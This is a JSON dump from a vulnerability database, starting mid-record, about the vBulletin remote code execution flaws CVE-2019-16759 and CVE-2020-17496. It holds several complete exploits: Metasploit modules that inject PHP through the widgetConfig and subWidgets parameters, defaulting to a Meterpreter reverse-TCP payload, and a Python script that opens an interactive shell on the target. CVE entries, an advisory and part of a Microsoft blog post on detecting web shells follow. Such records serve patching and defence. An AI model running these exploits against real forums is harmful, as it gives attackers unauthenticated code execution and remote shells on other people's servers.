[ true, \"The base path to the web application\", \"/\"])\r\n ])\r\n\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),\r\n 'encode_params' => false,\r\n 'vars_post' => \r\n {\r\n 'widgetConfig[code]' => \"echo shell_exec(\\'echo h4x0000r4l1f4 > /tmp/msf.check.out; cat /tmp/msf.check.out\\');exit;\",\r\n }\r\n })\r\n\r\n if res && res.body && res.body.include?('h4x0000r4l1f4')\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n print_status(\"Sending payload.....\")\r\n resp = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),\r\n 'encode_params' => false,\r\n 'vars_post' =>\r\n {\r\n #'widgetConfig[code]' => \"echo \" + payload.encoded + \"exit;\",\r\n\t 'widgetConfig[code]' => payload.encoded,\r\n }\r\n })\r\n #unless resp and resp.code == 200\r\n # fail_with(Failure::Unknown, \"Exploit failed.\")\r\n #end\r\n\r\n #print_good(\"Success!\")\r\n #print_line(resp.body)\r\n\r\n end\r\nend", "sourceHref": "https://www.exploit-db.com/download/47437", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2019-12-11T17:03:43", "description": "This Metasploit module exploits vBulletin versions 5.x through 5.5.4 leveraging a remote command execution vulnerability via the widgetConfig[code] parameter in an ajax/render/widget_php routestring POST request.", "cvss3": {}, "published": "2019-12-11T00:00:00", "type": "zdt", "title": "vBulletin 5.5.4 Remote Command Execution Exploit #RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-16759"], "modified": "2019-12-11T00:00:00", "id": "1337DAY-ID-33648", "href": "https://0day.today/exploit/description/33648", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'vBulletin widgetConfig RCE',\r\n 'Description' => %q{\r\n vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code]\r\n parameter in an ajax/render/widget_php routestring POST request.\r\n },\r\n 'Author' => [\r\n 'unknown', # discovered by an unknown sender.\r\n 'mekhalleh (RAMELLA S\u00e9bastien)' # this module.\r\n ],\r\n 'References' => [\r\n ['CVE', '2019-16759'],\r\n ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],\r\n ['URL', 'https://blog.sucuri.net/2019/09/zero-day-rce-in-vbulletin-v5-0-0-v5-5-4.html']\r\n ],\r\n 'DisclosureDate' => '2019-09-23',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['php', 'unix', 'windows'],\r\n 'Arch' => [ARCH_CMD, ARCH_PHP],\r\n 'Privileged' => true,\r\n 'Targets' => [\r\n ['Meterpreter (PHP In-Memory)',\r\n 'Platform' => 'php',\r\n 'Arch' => [ARCH_PHP],\r\n 'Type' => :php_memory,\r\n 'Payload' => {\r\n 'BadChars' => \"\\x22\",\r\n },\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'php/meterpreter/reverse_tcp',\r\n 'DisablePayloadHandler' => 'false'\r\n }\r\n ],\r\n ['Unix (CMD In-Memory)',\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :unix_cmd,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/generic',\r\n 'DisablePayloadHandler' => 'true'\r\n }\r\n ],\r\n ['Windows (CMD In-Memory)',\r\n 'Platform' => 'windows',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :windows_cmd,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/windows/generic',\r\n 'DisablePayloadHandler' => 'true'\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n 'SideEffects' => [IOC_IN_LOGS]\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'The URI of the vBulletin base path', '/']),\r\n OptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want to execute the payload.', 'shell_exec', ['shell_exec', 'exec']])\r\n ])\r\n\r\n register_advanced_options([\r\n OptBool.new('ForceExploit', [false, 'Override check result', false])\r\n ])\r\n end\r\n\r\n def cmd_payload(command)\r\n return(\"echo #{datastore['PHP_CMD']}('#{command}'); exit;\")\r\n end\r\n\r\n def execute_command(command)\r\n response = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'encode_params' => true,\r\n 'vars_post' => {\r\n 'routestring' => 'ajax/render/widget_php',\r\n 'widgetConfig[code]' => command\r\n }\r\n })\r\n if (response) && (response.body)\r\n return response\r\n end\r\n\r\n return false\r\n end\r\n\r\n def check\r\n rand_str = Rex::Text.rand_text_alpha(8)\r\n received = execute_command(cmd_payload(\"echo #{rand_str}\"))\r\n if received && received.body.include?(rand_str)\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n unless check.eql? Exploit::CheckCode::Vulnerable\r\n unless datastore['ForceExploit']\r\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\r\n end\r\n end\r\n vprint_good(\"The target appears to be vulnerable.\")\r\n\r\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\r\n case target['Type']\r\n when :unix_cmd, :windows_cmd\r\n cmd = cmd_payload(payload.encoded)\r\n vprint_status(\"Generated command payload: #{cmd}\")\r\n\r\n received = execute_command(cmd)\r\n if (received) && (datastore['PAYLOAD'] == \"cmd/#{target['Platform']}/generic\")\r\n print_warning('Dumping command output in body response')\r\n if received.body.empty?\r\n print_error('Empty response, no command output')\r\n return\r\n end\r\n print_line(\"#{received.body}\")\r\n end\r\n\r\n when :php_memory\r\n vprint_status(\"Generated command payload: #{payload.encoded}\")\r\n execute_command(payload.encoded)\r\n end\r\n end\r\nend\n\n# 0day.today [2019-12-11] #", "sourceHref": "https://0day.today/exploit/33648", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-14T22:01:00", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2020-08-12T00:00:00", "type": "zdt", "title": "vBulletin 5.6.2 - (widget_tabbedContainer_tab_panel) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-16759"], "modified": "2020-08-12T00:00:00", "id": "1337DAY-ID-34823", "href": "https://0day.today/exploit/description/34823", "sourceData": "# Exploit Title: vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution\r\n# Exploit Author: @zenofex\r\n# Vendor Homepage: https://www.vbulletin.com/\r\n# Software Link: None\r\n# Version: 5.4.5 through 5.6.2\r\n# Tested on: vBulletin 5.6.2 on Ubuntu 19.04\r\n# CVE : None\r\n\r\n# vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code\r\n# execution vulnerability caused by incomplete patching of the previous\r\n# \"CVE-2019-16759\" RCE. This logic bug allows for a single pre-auth\r\n# request to execute PHP code on a target vBulletin forum.\r\n\r\n#More info can be found at:\r\n#https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/\r\n\r\n\r\n#!/usr/bin/env python3\r\n# vBulletin 5.x pre-auth widget_tabbedContainer_tab_panel RCE exploit by @zenofex\r\n\r\nimport argparse\r\nimport requests\r\nimport sys\r\n\r\ndef run_exploit(vb_loc, shell_cmd):\r\n post_data = {'subWidgets[0][template]' : 'widget_php', 'subWidgets[0][config][code]' : \"echo shell_exec('%s'); exit;\" % shell_cmd}\r\n r = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data)\r\n return r.text\r\n\r\nap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE')\r\nap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.')\r\nARGS = ap.parse_args()\r\n\r\nwhile True:\r\n try:\r\n cmd = input(\"vBulletin5$ \")\r\n print(run_exploit(ARGS.location, cmd))\r\n except KeyboardInterrupt:\r\n sys.exit(\"\\nClosing shell...\")\r\n except Exception as e:\r\n sys.exit(str(e))\n\n# 0day.today [2020-08-14] #", "sourceHref": "https://0day.today/exploit/34823", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-04T07:54:27", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2019-10-01T00:00:00", "type": "zdt", "title": "vBulletin 5.x - Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-16759"], "modified": "2019-10-01T00:00:00", "id": "1337DAY-ID-33300", "href": "https://0day.today/exploit/description/33300", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'vBulletin 5.x 0day pre-quth RCE exploit',\r\n 'Description' => %q{\r\n vBulletin 5.x 0day pre-auth RCE exploit.\r\n This should work on all versions from 5.0.0 till 5.5.4\r\n },\r\n 'Platform' => 'php',\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Reported by: anonymous', # reported by\r\n 'Original exploit by: anonymous', # original exploit\r\n 'Metasploit mod by: r00tpgp', # metasploit module\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x22\",\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', 'CVE-2019-16759'],\r\n ['EDB', 'NA'],\r\n ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],\r\n ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759']\r\n ],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' => [\r\n [ 'Automatic Targeting', { 'auto' => true } ],\r\n # ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],\r\n # ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],\r\n ],\r\n 'DisclosureDate' => 'Sep 23 2019',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/\"])\r\n ])\r\n\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),\r\n 'encode_params' => false,\r\n 'vars_post' => \r\n {\r\n 'widgetConfig[code]' => \"echo shell_exec(\\'echo h4x0000r4l1f4 > /tmp/msf.check.out; cat /tmp/msf.check.out\\');exit;\",\r\n }\r\n })\r\n\r\n if res && res.body && res.body.include?('h4x0000r4l1f4')\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n print_status(\"Sending payload.....\")\r\n resp = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),\r\n 'encode_params' => false,\r\n 'vars_post' =>\r\n {\r\n #'widgetConfig[code]' => \"echo \" + payload.encoded + \"exit;\",\r\n\t 'widgetConfig[code]' => payload.encoded,\r\n }\r\n })\r\n #unless resp and resp.code == 200\r\n # fail_with(Failure::Unknown, \"Exploit failed.\")\r\n #end\r\n\r\n #print_good(\"Success!\")\r\n #print_line(resp.body)\r\n\r\n end\r\nend\n\n# 0day.today [2019-12-04] #", "sourceHref": "https://0day.today/exploit/33300", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-23T23:23:56", "description": "This Metasploit module exploits a logic bug within the template rendering code in vBulletin 5.x. The module uses the vBulletin template rendering functionality to render the widget_tabbedcontainer_tab_panel template while also providing the widget_php argument. This causes the former template to load the latter bypassing filters originally put in place to address CVE-2019-16759. This also allows the exploit to reach an eval call with user input allowing the module to achieve PHP remote code execution on the target. This module has been tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-12T00:00:00", "type": "zdt", "title": "vBulletin 5.x Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7373", "CVE-2019-16759"], "modified": "2020-08-12T00:00:00", "id": "1337DAY-ID-34826", "href": "https://0day.today/exploit/description/34826", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n prepend Msf::Exploit::Remote::AutoCheck\n\n HttpFingerprint = { method: 'GET', uri: '/', pattern: [/vBulletin.version = '5.+'/] }\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.',\n 'Description' => %q{\n This module exploits a logic bug within the template rendering code in vBulletin 5.x.\n The module uses the vBulletin template rendering functionality to render the\n 'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument.\n This causes the former template to load the latter bypassing filters originally put in place\n to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input\n allowing the module to achieve PHP remote code execution on the target. This module has been\n tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.\n },\n 'Author' => [\n 'Zenofex <zenofex[at]exploitee.rs>' # (@zenofex) PoC and Metasploit module\n ],\n 'References' => [\n ['URL', 'https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/'],\n ['CVE', '2020-7373']\n ],\n 'DisclosureDate' => '2020-08-09',\n 'License' => MSF_LICENSE,\n 'Platform' => ['php', 'unix', 'windows'],\n 'Arch' => [ARCH_CMD, ARCH_PHP],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Meterpreter (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => [ARCH_PHP],\n 'Type' => :php_memory,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'php/meterpreter/reverse_tcp',\n 'DisablePayloadHandler' => false\n }\n ],\n [\n 'Unix (CMD In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => true\n }\n ],\n [\n 'Windows (CMD In-Memory)',\n 'Platform' => 'windows',\n 'Arch' => ARCH_CMD,\n 'Type' => :windows_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/generic',\n 'DisablePayloadHandler' => true\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The URI of the vBulletin base path', '/']),\n OptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want to execute the payload.', 'shell_exec', ['shell_exec', 'exec']])\n ])\n\n end\n\n def cmd_payload(command)\n \"echo #{datastore['PHP_CMD']}(base64_decode('#{Rex::Text.encode_base64(command)}')); exit;\"\n end\n\n def execute_command(command)\n response = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/ajax/render/widget_tabbedcontainer_tab_panel'),\n 'encode_params' => true,\n 'vars_post' => {\n 'subWidgets[0][template]' => 'widget_php',\n 'subWidgets[0][config][code]' => command\n }\n })\n if response && response.body\n return response\n end\n\n false\n end\n\n def check\n rand_str = Rex::Text.rand_text_alpha(8)\n received = execute_command(cmd_payload(\"echo #{rand_str}\"))\n if received && received.body.include?(rand_str)\n return Exploit::CheckCode::Vulnerable\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\n case target['Type']\n when :unix_cmd, :windows_cmd\n cmd = cmd_payload(payload.encoded)\n vprint_status(\"Generated command payload: #{cmd}\")\n\n received = execute_command(cmd)\n if received && (datastore['PAYLOAD'] == \"cmd/#{target['Platform']}/generic\")\n print_warning('Dumping command output in body response')\n if received.body.empty?\n print_error('Empty response, no command output')\n return\n end\n print_line(received.body.to_s)\n end\n\n when :php_memory\n vprint_status(\"Generated command payload: #{payload.encoded}\")\n execute_command(payload.encoded)\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/34826", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T21:16:15", "description": "vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-24T22:15:00", "type": "cve", "title": "CVE-2019-16759", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/a:vbulletin:vbulletin:5.5.4"], "id": "CVE-2019-16759", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-16759", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vbulletin:vbulletin:5.5.4:*:*:*:*:*:*:*"]}, {"lastseen": "2022-10-26T14:27:55", "description": "vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-12T14:15:00", "type": "cve", "title": "CVE-2020-17496", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759", "CVE-2020-17496"], "modified": "2022-10-26T13:58:00", "cpe": ["cpe:/a:vbulletin:vbulletin:5.6.2"], "id": "CVE-2020-17496", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-17496", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vbulletin:vbulletin:5.6.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:53:10", "description": "vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759. ALSO NOTE: CVE-2020-7373 is a duplicate of CVE-2020-17496. CVE-2020-17496 is the preferred CVE ID to track this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-30T17:15:00", "type": "cve", "title": "CVE-2020-7373", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759", "CVE-2020-17496", "CVE-2020-7373"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/a:vbulletin:vbulletin:5.6.2"], "id": "CVE-2020-7373", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-7373", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vbulletin:vbulletin:5.6.2:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:18:54", "description": "A remote code execution vulnerability exists in vBulletin Forum. Successful exploitation of this vulnerability will allow remote attackers to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-09-25T00:00:00", "type": "checkpoint_advisories", "title": "vBulletin Forum Remote Code Execution (CVE-2019-16759; CVE-2020-17496)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759", "CVE-2020-17496"], "modified": "2020-09-02T00:00:00", "id": "CPAI-2019-1100", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2020-02-06T16:48:38", "description": "Recently, an organization in the public sector discovered that one of their internet-facing servers was misconfigured and allowed attackers to upload a web shell, which let the adversaries gain a foothold for further compromise. The organization enlisted the services of Microsoft\u2019s Detection and Response Team (DART) to conduct a full incident response and remediate the threat before it could cause further damage.\n\nDART\u2019s investigation showed that the attackers uploaded a web shell in multiple folders on the web server, leading to the subsequent compromise of service accounts and domain admin accounts. This allowed the attackers to perform reconnaissance using _net.exe,_ scan for additional target systems using _nbtstat.exe_, and eventually move laterally using PsExec.\n\nThe attackers installed additional web shells on other systems, as well as a DLL backdoor on an Outlook Web Access (OWA) server. To persist on the server, the backdoor implant registered itself as a service or as an [Exchange transport agent](<https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help>), which allowed it to access and intercept all incoming and outgoing emails, exposing sensitive information. The backdoor also performed additional discovery activities as well as downloaded other malware payloads. In addition, the attackers sent special emails that the DLL backdoor interpreted as commands.\n\n\n\n_Figure 1. Sample web shell attack chain_\n\nThe case is one of increasingly more common incidents of web shell attacks affecting multiple organizations in various sectors. A web shell is a piece of malicious code, often written in typical web development programming languages (e.g., ASP, PHP, JSP), that attackers implant on web servers to provide remote access and code execution to server functions. Web shells allow adversaries to execute commands and to steal data from a web server or use the server as launch pad for further attacks against the affected organization.\n\nWith the use of web shells in cyberattacks on the rise, Microsoft\u2019s DART, the Microsoft Defender ATP Research Team, and the Microsoft Threat Intelligence Center (MSTIC) have been working together to investigate and closely monitor this threat.\n\n## Web shell attacks in the current threat landscape\n\nMultiple threat actors, including [ZINC](<https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/>), [KRYPTON](<https://www.microsoft.com/security/blog/2017/12/04/windows-defender-atp-machine-learning-and-amsi-unearthing-script-based-attacks-that-live-off-the-land/>), and [GALLIUM](<https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/>), have been observed utilizing web shells in their campaigns. To implant web shells, adversaries take advantage of security gaps in internet-facing web servers, typically vulnerabilities in web applications, for example [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>) or [CVE-2019-16759](<https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-vbulletin-pre-auth-rce-vulnerability-cve-2019-16759/>).\n\nIn our investigations into these types of attacks, we have seen web shells within files that attempt to hide or blend in by using names commonly used for legitimate files in web servers, for example:\n\n * _index.aspx_\n * _fonts.aspx_\n * _css.aspx_\n * _global.aspx_\n * _default.php_\n * _function.php_\n * _Fileuploader.php_\n * _help.js_\n * _write.jsp_\n * _31.jsp_\n\nAmong web shells used by threat actors, the China Chopper web shell is one of the most widely used. One example is written in JSP:\n\n\n\nWe have seen this malicious JSP code within a specially crafted file uploaded to web servers:\n\n\n\n_Figure 2. Specially crafted image file with malicious JSP code_\n\nAnother China Chopper variant is written in PHP:\n\n\n\nMeanwhile, the KRYPTON group uses a bespoke web shell written in C# within an ASP.NET page:\n\n\n\n_Figure 3. Web shell written in C# within an ASP.NET page_\n\nOnce a web shell is successfully inserted into a web server, it can allow remote attackers to perform various tasks on the web server. Web shells can steal data, perpetrate watering hole attacks, and run other malicious commands for further compromise.\n\nWeb shell attacks have affected a wide range of industries. The organization in the public sector mentioned above represents one of the most common targeted sectors.\n\nAside from exploiting vulnerabilities in web applications or web servers, attackers take advantage of other weaknesses in internet-facing servers. These include the lack of the latest security updates, antivirus tools, network protection, proper security configuration, and informed security monitoring. Interestingly, we observed that attacks usually occur on weekends or during off-hours, when attacks are likely not immediately spotted and responded to.\n\nUnfortunately, these gaps appear to be widespread, given that every month, [Microsoft Defender Advanced Threat Protection (ATP)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection>) detects an average of 77,000 web shell and related artifacts on an average of 46,000 distinct machines.\n\n\n\n_Figure 3: Web shell encounters__ _\n\n## Detecting and mitigating web shell attacks\n\nBecause web shells are a multi-faceted threat, enterprises should build comprehensive defenses for multiple attack surfaces. [Microsoft Threat Protection](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides unified protection for identities, endpoints, email and data, apps, and infrastructure. Through signal-sharing across Microsoft services, customers can leverage Microsoft\u2019s industry-leading optics and security technologies to combat web shells and other 